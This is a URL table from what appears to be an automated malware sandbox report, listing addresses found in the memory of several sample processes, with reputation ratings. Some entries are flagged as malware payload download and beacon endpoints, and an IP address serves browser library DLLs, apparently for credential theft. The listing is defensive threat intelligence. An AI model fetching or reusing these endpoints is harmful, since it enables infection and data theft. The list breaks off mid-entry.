https://duckduckgo.com/ac/?q=	build2.exe, 00000013.00000003.1976258709.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891265405.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891368898.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891563712.0000000003A36000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000002.00000000.1428012829.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2076060809.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002489458.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2635780083.000000000921D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2050787309.000000000921D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2059945515.000000000921D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2053341050.000000000921D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://outlook.comy	explorer.exe, 00000027.00000003.2051835284.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2055909414.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2059945515.00000000092B3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://95.216.179.73/softokn3.dllN	build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.gstatic.cn/recaptcha/	build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-	explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/t8jmhl	build2.exe, 00000012.00000002.1803333267.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json&	1601.exe, 00000026.00000002.2013286171.00000000005AA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin	explorer.exe, 00000002.00000000.1435191718.000000000D1D6000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://sajdfue.com/files/1/build3.exerun381	1601.exe, 00000010.00000002.2621304334.0000000000901000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://95.216.179.73;	build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=GcU7	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://sajdfue.com/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD&first=trueL3V9	1601.exe, 00000010.00000002.2621304334.0000000000878000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.reddit.com/	1601.exe, 00000010.00000003.1828509755.00000000098D0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://95.216.179.73/amData	build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2076060809.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://95.216.179.73/softokn3.dllb	build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000002.00000000.1428983456.00000000070CE000.00000004.00000001.00020000.00000000.sdmp	false		high
http://ns.micr9	explorer.exe, 00000027.00000002.2632605296.0000000004CE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonP	1601.exe, 0000001D.00000002.1908938116.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	build2.exe, 00000013.00000003.1976258709.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891265405.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891368898.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891563712.0000000003A36000.00000004.00000800.00020000.00000000.sdmp	false		high
https://95.216.179.73/ocal	build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://sdfjhuz.com/dl/build2.exe$run	1601.exe, 00000010.00000002.2621304334.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2628394160.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2621304334.000000000090E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.rootca1.amazontrust.com0:	455F.exe, 00000014.00000003.1923072879.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://95.216.179.73/$/B	build2.exe, 00000013.00000003.1974746557.0000000000A90000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://resergvearyinitiani.shop/lc	455F.exe, 00000014.00000003.1994160250.0000000001561000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000002.2020805404.0000000001565000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc	explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2076060809.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002489458.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	build2.exe, 00000013.00000003.1976258709.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891265405.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891368898.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1891563712.0000000003A36000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.youtube.com/	build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://95.216.179.73Local	build2.exe, 00000013.00000002.2287228950.000000000051A000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.2ip.ua/geo.json=	1601.exe, 00000009.00000002.1747762980.0000000000708000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json8	1601.exe, 0000001D.00000002.1908938116.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://sajdfue.com/files/1/build3.exe$run	1601.exe, 00000010.00000002.2621304334.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2628394160.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2621304334.000000000090E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://95.216.179.73/&w	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://sajdfue.com/test1/get.phpy	1601.exe, 00000011.00000002.2620858851.0000000000768000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=yEYKdqHaNBdl&l=en	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json1	1601.exe, 00000011.00000002.2620858851.0000000000728000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonN	1601.exe, 0000001D.00000002.1908938116.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonI	1601.exe, 00000011.00000002.2620858851.0000000000728000.00000004.00000020.00020000.00000000.sdmp	false		high
https://95.216.179.73/vcruntime140.dllV	build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199662282318https://t.me/t8jmhlCristina	build2.exe, 00000012.00000002.1803333267.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.msn.com/$	explorer.exe, 00000002.00000000.1430666341.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	false		high
https://95.216.179.73	build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=04yYNdQN	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/	build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://95.216.179.73/curity	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199662282318	build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.amazon.com/	1601.exe, 00000010.00000003.1827663370.00000000098D0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.njy8xaI_aUJp	build2.exe, 00000013.00000003.2177938810.000000001F07B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 00000002.00000000.1427818768.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1429897160.0000000007B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1429876223.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	explorer.exe, 00000002.00000000.1428983456.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2076060809.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2002401471.00000000048F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.twitter.com/	1601.exe, 00000010.00000003.1828581062.00000000098D0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://95.216.179.73/nss3.dllK	build2.exe, 00000013.00000003.2178220517.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2159379373.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114848022.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2164551135.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://recaptcha.net/recaptcha/;	build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.openssl.org/support/faq.html	1601.exe, 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://sajdfue.com/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDDE	1601.exe, 00000011.00000002.2620858851.00000000007C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	1601.exe, 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 0000000F.00000002.1764359339.0000000004960000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 0000001C.00000002.1898227455.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 00000022.00000002.2000374378.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 